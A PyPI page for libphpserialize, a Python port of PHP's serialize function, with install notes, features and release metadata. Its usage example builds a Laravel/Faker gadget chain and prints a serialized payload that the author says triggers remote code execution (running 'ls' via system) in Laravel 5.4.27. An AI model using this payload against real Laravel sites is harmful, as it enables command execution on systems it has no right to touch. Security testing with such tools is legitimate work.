A port of PHP's serialize function, in pure python

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for frankli0324 from gravatar.com frankli0324

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • License: MIT License
  • Author: Frank
  • Requires: Python >=3.7
Classifiers
Report project as malware

Project description

libphpserialize

A port of PHP's serialize function, in pure python

Installation

pip install libphpserialize

Features

  • serialize objects directly from python objects
  • nested objects
  • namespacing
  • variable Access Modifiers (public, private, protected)

Example

from phpserialize import serialize
from phpserialize.decorators import namespace
import requests


@namespace('Faker')
class Generator:
    protected_formatters = {'dispatch': 'system'}


@namespace('Illuminate\Broadcasting')
class PendingBroadcast:
    protected_event = 'ls'
    protected_events = Generator()


print(serialize(PendingBroadcast()))

with above code, you'll get:

O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:15:"Faker\Generator":1:{s:13:"*formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"*event";s:2:"ls";}

which triggers an RCE vulnerability in Laravel 5.4.27

nice when you're writing an exploit script for others to read

Important:

  • the code is written and tested under python 3.7+
  • decimal serialization doesn't work the same as PHP does, yet

TODO

  • recursive objects support
  • reimplement decimal precision calculating algorithm from php engine

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for frankli0324 from gravatar.com frankli0324

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • License: MIT License
  • Author: Frank
  • Requires: Python >=3.7
Classifiers

Release history Release notifications | RSS feed

0.0.8

0.0.7

This version

0.0.6

0.0.5

0.0.4

0.0.3

0.0.2

0.0.1

0.0.1b5 pre-release

0.0.1b4 pre-release

0.0.1b3 pre-release

0.0.1b2 pre-release

0.0.1b0 pre-release

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

libphpserialize-0.0.6.tar.gz (5.1 kB view details)

Uploaded Source

Built Distribution

libphpserialize-0.0.6-py3-none-any.whl (6.2 kB view details)

Uploaded Python 3

File details

Details for the file libphpserialize-0.0.6.tar.gz.

File metadata

  • Download URL: libphpserialize-0.0.6.tar.gz
  • Upload date:
  • Size: 5.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.10.6

File hashes

Hashes for libphpserialize-0.0.6.tar.gz
Algorithm Hash digest
SHA256 68678a37b264bb66d6041bf878d29fafa2be1a8e8fb462dd74e71bca3e7bff31
MD5 a661731045b29b1f6c78f47c292a4598
BLAKE2b-256 8ea821246c9464ffb98f017b8ce9541804c7b718561fcb6a81f09d245e9e4892

See more details on using hashes here.

File details

Details for the file libphpserialize-0.0.6-py3-none-any.whl.

File metadata

File hashes

Hashes for libphpserialize-0.0.6-py3-none-any.whl
Algorithm Hash digest
SHA256 85446109b5519fa99d4891ea6740d707bf4153bef868956b822951656ac1554c
MD5 8c01547bc9efd57077a46f7851023955
BLAKE2b-256 c69f0df99e513f5245801834b7c0ec8a9805d949ee13da4c9ad96dabf1abdafa

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page